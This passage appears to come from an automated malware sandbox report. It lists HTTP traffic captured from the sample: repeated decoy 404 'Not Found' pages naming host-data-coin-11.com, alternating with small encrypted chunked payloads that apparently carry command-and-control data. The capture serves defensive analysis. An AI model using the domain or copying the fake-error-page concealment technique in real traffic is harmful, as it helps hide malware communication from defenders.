6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed a1 88 70 bc 57 dd 43 d4 fa 20 87 20 e7 c3 9a 57 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC W*c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:31:54 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 de 40 d7 fe 2e 82 25 ee a8 9a 51 2f ef be 4a 2b e3 b3 b7 6f f0 98 bc 5a aa 76 97 ca 33 42 56 36 03 4b d9 bb 41 bb f6 57 d9 b1 c2 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 61I:82OB%,YR("XS@.%Q/J+oZv3BV6KAW0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
